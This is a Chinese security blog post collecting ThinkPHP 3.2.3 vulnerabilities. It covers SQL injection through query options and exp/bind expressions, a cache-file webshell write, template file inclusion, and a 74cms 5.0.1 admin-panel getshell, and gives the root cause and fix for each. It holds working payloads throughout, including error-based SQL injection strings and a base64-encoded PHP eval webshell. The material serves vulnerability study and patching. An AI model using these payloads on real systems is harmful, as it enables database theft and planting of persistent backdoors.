

<!DOCTYPE html>
<html lang="zn-CN" data-default-color-scheme=&#34;auto&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/windL1n/img/favicon.png">
  <link rel="icon" href="/windL1n/img/favicon.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="">
  <meta name="author" content="windL1n">
  <meta name="keywords" content="">
  
  <title>Thinkphp3漏洞 - windL1n&#39;s Blog</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/windL1n/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10.7.2/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css" />
  



<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/windL1n/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"a-fenglin.github.io","root":"/windL1n/","version":"1.8.11","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null}},"search_path":"/local-search.xml"};
  </script>
  <script  src="/windL1n/js/utils.js" ></script>
  <script  src="/windL1n/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.4.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/windL1n/">&nbsp;<strong>WindL1n</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/windL1n/">
                <i class="iconfont icon-home-fill"></i>
                主页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/windL1n/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/windL1n/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/windL1n/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/windL1n/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/windL1n/img/default.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="Thinkphp3漏洞">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2021-07-05 10:25" pubdate>
        July 5, 2021 am
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      3.4k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      49
       分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">Thinkphp3漏洞</h1>
            
            <div class="markdown-body">
              <h1 id="thinkphp3漏洞整理"><a href="#thinkphp3漏洞整理" class="headerlink" title="thinkphp3漏洞整理"></a>thinkphp3漏洞整理</h1><h2 id="0x01-thinkphp3-2-3-SQL注入"><a href="#0x01-thinkphp3-2-3-SQL注入" class="headerlink" title="0x01 thinkphp3.2.3 SQL注入"></a>0x01 thinkphp3.2.3 SQL注入</h2><h3 id="find-select-delete注入"><a href="#find-select-delete注入" class="headerlink" title="find/select/delete注入"></a>find/select/delete注入</h3><ol>
<li><p>环境：</p>
<p>Apache2.4.39；php7.3.4; mysql5.7.26</p>
<p>thinkphp3.2.3框架（开启debug)</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-variable">$data</span> = M(<span class="hljs-string">&#x27;users&#x27;</span>)-&gt;find(I(<span class="hljs-string">&#x27;GET.id&#x27;</span>));<br><span class="hljs-comment">//$data = M(&#x27;users&#x27;)-&gt;select(I(&#x27;GET.id&#x27;));</span><br><span class="hljs-comment">// $res = M(&#x27;user&#x27;)-&gt;delete(I(&#x27;GET.id&#x27;));</span><br>var_dump(<span class="hljs-variable">$data</span>);<br></code></pre></td></tr></table></figure></li>
<li><p>payload:</p>
<p>针对find/select/delete方法:</p>
<figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs pgsql">?id[<span class="hljs-keyword">where</span>]=<span class="hljs-number">1</span> <span class="hljs-keyword">and</span> <span class="hljs-number">1</span>=updatexml(<span class="hljs-number">1</span>,concat(<span class="hljs-number">0x7e</span>,(<span class="hljs-keyword">select</span> <span class="hljs-keyword">password</span> <span class="hljs-keyword">from</span> users <span class="hljs-keyword">limit</span> <span class="hljs-number">1</span>),<span class="hljs-number">0x7e</span>),<span class="hljs-number">1</span>)#<br></code></pre></td></tr></table></figure>

<p>执行结果：</p>
<p><img src="F:\DAS\image-20201224090349977.png" srcset="/windL1n/img/loading.gif" lazyload alt="image-20201224090349977"></p>
<hr>
<p>针对table/alias/where方法：</p>
<figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs pgsql">?id[<span class="hljs-keyword">table</span>]=<span class="hljs-keyword">user</span> <span class="hljs-keyword">where</span> <span class="hljs-number">1</span> <span class="hljs-keyword">and</span> updatexml(<span class="hljs-number">1</span>,concat(<span class="hljs-number">0x7e</span>,<span class="hljs-keyword">user</span>(),<span class="hljs-number">0x7e</span>),<span class="hljs-number">1</span>)<span class="hljs-comment">--</span><br>?id[<span class="hljs-keyword">alias</span>]=<span class="hljs-keyword">where</span> <span class="hljs-number">1</span> <span class="hljs-keyword">and</span> updatexml(<span class="hljs-number">1</span>,concat(<span class="hljs-number">0x7e</span>,<span class="hljs-keyword">user</span>(),<span class="hljs-number">0x7e</span>),<span class="hljs-number">1</span>)<span class="hljs-comment">--</span><br>?id[<span class="hljs-keyword">where</span>]=<span class="hljs-number">1</span> <span class="hljs-keyword">and</span> updatexml(<span class="hljs-number">1</span>,concat(<span class="hljs-number">0x7e</span>,<span class="hljs-keyword">user</span>(),<span class="hljs-number">0x7e</span>),<span class="hljs-number">1</span>)<span class="hljs-comment">--</span><br>?id[<span class="hljs-keyword">alias</span>]=<span class="hljs-keyword">where</span> id=<span class="hljs-number">1</span> <span class="hljs-keyword">and</span> <span class="hljs-number">1</span><span class="hljs-comment">--</span><br></code></pre></td></tr></table></figure></li>
<li><p>漏洞成因</p>
<p>I()函数：默认过滤方法为htmlspecialchars，使得&lt;&gt;变为html实体; 回调think_filter函数进行过滤</p>
<p>find()函数：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-variable">$options</span>   =   <span class="hljs-keyword">$this</span>-&gt;_parseOptions(<span class="hljs-variable">$options</span>);<br></code></pre></td></tr></table></figure></li>
</ol>
<p>​       传入参数的值的顺序是id=1’ -&gt; I() -&gt; find() -&gt; _parseOptions() -&gt; _parseType()</p>
<p>​       直接拼接了where里的内容，没有进行过滤。</p>
<ol start="4">
<li><p>漏洞修复：</p>
<p>将<code>$options</code>和<code>$this-&gt;options</code>进行了区分，从而传入的参数无法污染到<code>$this-&gt;options</code>，无法控制sql语句。thinkphp3.2.4版本已修复。</p>
</li>
</ol>
<h3 id="exp注入"><a href="#exp注入" class="headerlink" title="exp注入"></a>exp注入</h3><ol>
<li><p>环境：</p>
<p>Apache2.4.39；php7.3.4; mysql5.7.26</p>
<p>thinkphp3.2.3框架（开启debug)</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">expsql</span>(<span class="hljs-params"></span>)</span>&#123;<br>    <span class="hljs-variable">$User</span> = D(<span class="hljs-string">&#x27;users&#x27;</span>);<br>    <span class="hljs-variable">$map</span> = <span class="hljs-keyword">array</span>(<span class="hljs-string">&#x27;user&#x27;</span> =&gt; <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;user&#x27;</span>]);<br>    <span class="hljs-comment">// $map = array(&#x27;user&#x27; =&gt; I(&#x27;user&#x27;)); error</span><br>    <span class="hljs-variable">$user</span> = <span class="hljs-variable">$User</span>-&gt;where(<span class="hljs-variable">$map</span>)-&gt;find();<br>    <span class="hljs-comment">// var_dump($user);</span><br>&#125;<br></code></pre></td></tr></table></figure></li>
<li><p>payload:</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">exp</span>:?user[<span class="hljs-number">0</span>]=exp&amp;user[<span class="hljs-number">1</span>]==<span class="hljs-number">1</span> and updatexml(<span class="hljs-number">1</span>,concat(<span class="hljs-number">0</span>x<span class="hljs-number">7</span>e,user(),<span class="hljs-number">0</span>x<span class="hljs-number">7</span>e),<span class="hljs-number">1</span>);<br></code></pre></td></tr></table></figure>

<p>执行结果：</p>
<p><img src="F:\DAS\image-20201224103612649.png" srcset="/windL1n/img/loading.gif" lazyload alt="image-20201224103612649"></p>
</li>
<li><p>漏洞成因：</p>
<p><strong>find()</strong>-&gt;<strong>db-&gt;select()</strong>-&gt;<strong>buildSelectSql()</strong>-&gt;<strong>parseSql()</strong>-&gt;<strong>parseWhere()</strong>-&gt;<strong>parseWhereItem()</strong></p>
<p>parseWhereItem()</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs php">is_array(<span class="hljs-variable">$val</span>[<span class="hljs-number">1</span>])<br><span class="hljs-comment">/*</span><br><span class="hljs-comment"></span><br><span class="hljs-comment">*/</span><br><span class="hljs-keyword">elseif</span>(<span class="hljs-string">&#x27;bind&#x27;</span> == <span class="hljs-variable">$exp</span> )&#123; <span class="hljs-comment">// 使用表达式</span><br>    <span class="hljs-variable">$whereStr</span> .= <span class="hljs-variable">$key</span>.<span class="hljs-string">&#x27; = :&#x27;</span>.<span class="hljs-variable">$val</span>[<span class="hljs-number">1</span>];<br>&#125;<span class="hljs-keyword">elseif</span>(<span class="hljs-string">&#x27;exp&#x27;</span> == <span class="hljs-variable">$exp</span> )&#123; <span class="hljs-comment">// 使用表达式</span><br>    <span class="hljs-variable">$whereStr</span> .= <span class="hljs-variable">$key</span>.<span class="hljs-string">&#x27; &#x27;</span>.<span class="hljs-variable">$val</span>[<span class="hljs-number">1</span>];<br></code></pre></td></tr></table></figure>

<p>where条件直接用.拼接，数组索引0的值为exp或者bind，索引1的值为传入的数据。</p>
</li>
<li><p>修复：</p>
<p>使用I()函数接收传入的参数数据，I()会回调think_filter函数，在EXP后加上空格。</p>
</li>
</ol>
<h3 id="bind注入"><a href="#bind注入" class="headerlink" title="bind注入"></a>bind注入</h3><ol>
<li><p>环境：</p>
<p>Apache2.4.39；php7.3.4; mysql5.7.26</p>
<p>thinkphp3.2.3框架（开启debug)</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-variable">$User</span> = M(<span class="hljs-string">&quot;users&quot;</span>);<br><span class="hljs-variable">$user</span>[<span class="hljs-string">&#x27;user_id&#x27;</span>] = I(<span class="hljs-string">&#x27;id&#x27;</span>);<br><span class="hljs-variable">$data</span>[<span class="hljs-string">&#x27;password&#x27;</span>] = I(<span class="hljs-string">&#x27;password&#x27;</span>);<br><span class="hljs-variable">$value</span> = <span class="hljs-variable">$User</span>-&gt;where(<span class="hljs-variable">$user</span>)-&gt;save(<span class="hljs-variable">$data</span>);<br>var_dump(<span class="hljs-variable">$value</span>);<br></code></pre></td></tr></table></figure></li>
<li><p>payload:</p>
<figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs pgsql">?id[<span class="hljs-number">0</span>]=bind&amp;id[<span class="hljs-number">1</span>]=<span class="hljs-number">0</span> <span class="hljs-keyword">and</span> (updatexml(<span class="hljs-number">1</span>,concat(<span class="hljs-number">0x7e</span>,<span class="hljs-keyword">user</span>(),<span class="hljs-number">0x7e</span>),<span class="hljs-number">1</span>))&amp;<span class="hljs-keyword">password</span>=<span class="hljs-number">123456</span><br></code></pre></td></tr></table></figure>

<p>运行结果：</p>
<p><img src="F:\DAS\image-20201224135301757.png" srcset="/windL1n/img/loading.gif" lazyload alt="image-20201224135301757"></p>
</li>
<li><p>漏洞成因：<br>在parseWhereItem()函数中，拼接数组索引1的值时插入:</p>
</li>
</ol>
  <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">is_array(<span class="hljs-variable">$val</span>[<span class="hljs-number">1</span>])<span class="hljs-comment">/**/</span><span class="hljs-keyword">elseif</span>(<span class="hljs-string">&#x27;bind&#x27;</span> == <span class="hljs-variable">$exp</span> )&#123; <span class="hljs-comment">// 使用表达式    $whereStr .= $key.&#x27; = :&#x27;.$val[1];&#125;elseif(&#x27;exp&#x27; == $exp )&#123; // 使用表达式    $whereStr .= $key.&#x27; &#x27;.$val[1];</span><br></code></pre></td></tr></table></figure>

<p>  在db-&gt;driver中</p>
  <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-keyword">$this</span>-&gt;queryStr =   strtr(<span class="hljs-keyword">$this</span>-&gt;queryStr,array_map(<span class="hljs-function"><span class="hljs-keyword">function</span>(<span class="hljs-params"><span class="hljs-variable">$val</span></span>) <span class="hljs-keyword">use</span>(<span class="hljs-params"><span class="hljs-variable">$that</span></span>)</span>&#123; <span class="hljs-keyword">return</span> <span class="hljs-string">&#x27;\&#x27;&#x27;</span>.<span class="hljs-variable">$that</span>-&gt;escapeString(<span class="hljs-variable">$val</span>).<span class="hljs-string">&#x27;\&#x27;&#x27;</span>; &#125;,<span class="hljs-keyword">$this</span>-&gt;bind));<br></code></pre></td></tr></table></figure>

<p>  这条语句执行后，将UPDATE <code>users</code> SET <code>password</code>=:0 WHERE <code>user_id</code> = :0 and (updatexml(1,concat(0x7e,user(),0x7e),1))</p>
<p>  中的:0全部替换成$this-&gt;bind[‘:0’]=’123456’;</p>
<p>  得到UPDATE <code>users</code> SET <code>password</code>=’123456’ WHERE <code>user_id</code> = ‘123456’ and (updatexml(1,concat(0x7e,user(),0x7e),1))</p>
<ol start="4">
<li><p>修复：</p>
<p>在thinkphp_filter函数的匹配条件里加上bind。</p>
</li>
</ol>
<h2 id="0x02-thinkphp3-2-3-缓存-getshell"><a href="#0x02-thinkphp3-2-3-缓存-getshell" class="headerlink" title="0x02 thinkphp3.2.3 缓存 getshell"></a>0x02 thinkphp3.2.3 缓存 getshell</h2><ol>
<li><p>环境</p>
<p>Apache2.4.39；php7.3.4; mysql5.7.26</p>
<p>thinkphp3.2.3框架（开启debug)</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">数据缓存：<span class="hljs-variable">$cache</span>=I(<span class="hljs-string">&#x27;post.cache&#x27;</span>);S(<span class="hljs-string">&#x27;name&#x27;</span>,<span class="hljs-variable">$cache</span>);快速缓存F(<span class="hljs-variable">$name</span>, <span class="hljs-variable">$value</span>=<span class="hljs-string">&#x27;&#x27;</span>);<br></code></pre></td></tr></table></figure></li>
<li><p>payload:   </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs url">cache=%0A%24a%3deval(%24_POST%5b%27cmd%27%5d)%3b%2f%2f<br></code></pre></td></tr></table></figure>

<p>将小马写入日志文件，通过绝对路径访问<a target="_blank" rel="noopener" href="http://localhost/Application/Runtime/Temp/b068931cc450442b63f5b3d276ea4297.php%EF%BC%8C%E8%9A%81%E5%89%91%E8%BF%9E%E6%8E%A5%E3%80%82">http://localhost/Application/Runtime/Temp/b068931cc450442b63f5b3d276ea4297.php，蚁剑连接。</a></p>
<p>利用条件：</p>
<ul>
<li>需要得到缓存文件路径</li>
<li>缓存内容可写可控，写入php代码</li>
</ul>
</li>
<li><p>漏洞成因：</p>
<p>缓存文件路径：/Application/Runtime/Temp/<strong>md5(缓存标识).php</strong>   (32位小写)</p>
<p>缓存内容可写可控，直接将php代码写入缓存。</p>
</li>
<li><p>修复：</p>
<ul>
<li><p>方法一  禁止访问/Runtime目录，添加.htaccess文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs t">&lt;IfModule mod_rewrite.c&gt; deny from all&lt;/IfModule&gt;<br></code></pre></td></tr></table></figure></li>
<li><p>方法二  在/Think/Cache/Driver/File.class.php的set方法里对写入缓存的内容过滤换行符</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-variable">$data</span> = str_replace(PHP_EOL, <span class="hljs-string">&#x27;&#x27;</span>, <span class="hljs-variable">$data</span>);<br></code></pre></td></tr></table></figure>

<p>Windows下PHP_EOF相当于”\r\n” ，当payload只有%0D或者%0A时，过滤失败，可以写入小马，防止被注释。</p>
<p>Linux环境下，给/Runtime/Temp加上写权限：PHP_EOF相当于”\n”，可以输入%0D换行符，输入小马，防止被注释。</p>
</li>
</ul>
</li>
</ol>
<h2 id="0x03-thinkphp3-2-3-ssti漏洞"><a href="#0x03-thinkphp3-2-3-ssti漏洞" class="headerlink" title="0x03 thinkphp3.2.3 ssti漏洞"></a>0x03 thinkphp3.2.3 ssti漏洞</h2><ol>
<li><p>环境</p>
<p>Apache2.4.39；php7.3.4；mysql5.7.26</p>
<p>thinkphp3.2.3框架</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span>namespace Home\Controller;<span class="hljs-keyword">use</span> <span class="hljs-title">Think</span>\<span class="hljs-title">Controller</span>;<span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">TmptestController</span> <span class="hljs-keyword">extends</span> <span class="hljs-title">Controller</span> </span>&#123;  <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">index</span>(<span class="hljs-params"></span>)</span>&#123;    <span class="hljs-comment">//$this-&gt;assign(&#x27;type&#x27;,$type);    $this-&gt;display(&#x27;Tmptest/&#x27;.I(&#x27;get.type&#x27;));  &#125;&#125;</span><br></code></pre></td></tr></table></figure></li>
<li><p>漏洞利用</p>
<p>payload:</p>
<figure class="highlight sas"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sas">/<span class="hljs-meta">index</span>.php?m=Home<span class="hljs-variable">&amp;c</span>=Tmptest<span class="hljs-variable">&amp;a</span>=<span class="hljs-meta">index</span><span class="hljs-variable">&amp;type</span>=../favicon.ico<br></code></pre></td></tr></table></figure>

<p>上传小马文件，进行文件包含。</p>
</li>
<li><p>漏洞成因</p>
<p>display函数的参数($templateFile=’’,$charset=’’,$contentType=’’,$content=’’,$prefix=’’)，传入view-&gt;fetch()，</p>
<p>当输入参数只有模板文件名，传入content参数为空时，会调用parseTemplate函数，只要存在$templateFile就返回true</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-keyword">if</span>(is_file(<span class="hljs-variable">$template</span>)) &#123;	<span class="hljs-keyword">return</span> <span class="hljs-variable">$template</span>;&#125;<br></code></pre></td></tr></table></figure>

<p>默认是thinkphp自带的Think模板，执行以下代码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-variable">$params</span> = <span class="hljs-keyword">array</span>(<span class="hljs-string">&#x27;var&#x27;</span>=&gt;<span class="hljs-keyword">$this</span>-&gt;tVar,<span class="hljs-string">&#x27;file&#x27;</span>=&gt;<span class="hljs-variable">$templateFile</span>,<span class="hljs-string">&#x27;content&#x27;</span>=&gt;<span class="hljs-variable">$content</span>,<span class="hljs-string">&#x27;prefix&#x27;</span>=&gt;<span class="hljs-variable">$prefix</span>);Hook::listen(<span class="hljs-string">&#x27;view_parse&#x27;</span>,<span class="hljs-variable">$params</span>);<br></code></pre></td></tr></table></figure>

<p>view_parse作为系统行为扩展中的模板解析，执行Behavior\ParseTemplateBehavior中的run函数，因为传入的content参数内容为空，执行以下代码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-variable">$tpl</span> = Think::instance(<span class="hljs-string">&#x27;Think\\Template&#x27;</span>);<span class="hljs-comment">// 编译并加载模板文件$tpl-&gt;fetch($_content,$_data[&#x27;var&#x27;],$_data[&#x27;prefix&#x27;]);</span><br></code></pre></td></tr></table></figure>

<p>接着执行Think:Template.class/fetch方法</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">fetch</span>(<span class="hljs-params"><span class="hljs-variable">$templateFile</span>,<span class="hljs-variable">$templateVar</span>,<span class="hljs-variable">$prefix</span>=<span class="hljs-string">&#x27;&#x27;</span></span>) </span>&#123;  <span class="hljs-keyword">$this</span>-&gt;tVar         =   <span class="hljs-variable">$templateVar</span>;  <span class="hljs-variable">$templateCacheFile</span>  =   <span class="hljs-keyword">$this</span>-&gt;loadTemplate(<span class="hljs-variable">$templateFile</span>,<span class="hljs-variable">$prefix</span>);  <span class="hljs-comment">// 将文件内容写入一个缓存文件中  Storage::load($templateCacheFile,$this-&gt;tVar,null,&#x27;tpl&#x27;);&#125;</span><br></code></pre></td></tr></table></figure>

<p>其中缓存文件目录/Application/Runtime/Cache/Home，再加载load函数文件包含Cache文件</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-keyword">if</span>(!is_null(<span class="hljs-variable">$vars</span>))&#123;   extract(<span class="hljs-variable">$vars</span>, EXTR_OVERWRITE);&#125;<span class="hljs-keyword">include</span> <span class="hljs-variable">$_filename</span>;<br></code></pre></td></tr></table></figure>

<p>这中间没有对templateFile参数进行过滤，只是确定网站目录下是否存在这个文件，就会进行文件包含。只要是display的参数中$templateFile参数可控，可以进行文件包含。</p>
<ul>
<li><p>display函数</p>
<p>只能控制template文件名，进行文件包含</p>
</li>
<li><p>fetch函数 </p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-variable">$content</span> = <span class="hljs-keyword">$this</span>-&gt;fetch(<span class="hljs-string">&#x27;1.php&#x27;</span>,<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;type&#x27;</span>],<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>);var_dump(<span class="hljs-variable">$content</span>);<br></code></pre></td></tr></table></figure>

<p>需要将结果输出，才能看到结果，同时content参数可控，写入php代码，//  也可以文件包含，但是包含的文件里得有</p>
<p>payload:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">type=&lt;php&gt; phpinfo();&lt;/php&gt; 或者<span class="hljs-meta">&lt;?php</span> phpinfo();<br></code></pre></td></tr></table></figure></li>
<li><p>虽然禁止访问Common模块，但还是可以直接访问Common模块下控制器里的方法，index.php?a=xxxx</p>
</li>
<li><?php phpinfo(); ob_flush(); flush();?>

<p><em><strong>program data  &gt;&gt;   php buffer   &gt;&gt;  tcp buffer  &gt;&gt;  client</strong></em>  </p>
</li>
</ul>
</li>
</ol>
<h2 id="0x04-74cms"><a href="#0x04-74cms" class="headerlink" title="0x04 74cms"></a>0x04 74cms</h2><ol>
<li><p>环境</p>
<p>Apache2.4.39；php5.3.29; mysql5.7.26</p>
<p>74cms_Home_Setup_v5.0.1  thinkphp3.2.3框架</p>
</li>
<li><p>后台地址：<a target="_blank" rel="noopener" href="http://74cms501.com/index.php?m=admin&amp;c=index&amp;a=login">http://74cms501.com/index.php?m=admin&amp;c=index&amp;a=login</a></p>
</li>
</ol>
<h3 id="后台getshell"><a href="#后台getshell" class="headerlink" title="后台getshell"></a>后台getshell</h3><ol>
<li><p>影响范围：74CMS_v5.0.1</p>
</li>
<li><p>利用条件</p>
<ul>
<li>拿到后台管理员账号密码</li>
</ul>
</li>
<li><p>漏洞利用</p>
<p>登录后台，修改网站配置，用burpsuite抓包，修改site_domain的值为site_domain=’,file_put_contents(‘403.php’,base64_decode(‘PD9waHAgZXZhbCgkX1BPU1RbJ2NtZCddKTs/Pg==’)),’</p>
<p>（前后加单引号是为了闭合字符串前后所加的单引号）</p>
<p><img src="F:\DAS\image-20201225121948630.png" srcset="/windL1n/img/loading.gif" lazyload></p>
<p>get访问GET /Application/Common/Conf/url.php，触发代码，在/Application/Common/Conf目录下，写入403.php，内容为<?php eval($_POST['cmd']);?> </p>
<p>连接/Application/Common/Conf/403.php</p>
</li>
<li><p>漏洞成因</p>
<p>对输入的site_domain数据没有进行过滤，执行以下代码，将内容写入到/Application/Common/Conf/url.php文件中，恶意代码执行。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-keyword">$this</span>-&gt;update_config(<span class="hljs-variable">$config</span>,CONF_PATH.<span class="hljs-string">&#x27;url.php&#x27;</span>);<br></code></pre></td></tr></table></figure>

<p>update_config函数</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">file_put_contents(<span class="hljs-variable">$config_file</span>, <span class="hljs-string">&quot;&lt;?php \nreturn &quot;</span> . stripslashes(var_export(<span class="hljs-variable">$config</span>, <span class="hljs-literal">true</span>)) . <span class="hljs-string">&quot;;&quot;</span>, LOCK_EX);<br></code></pre></td></tr></table></figure>

<p>去除反斜杠，不影响写入payload。</p>
</li>
</ol>
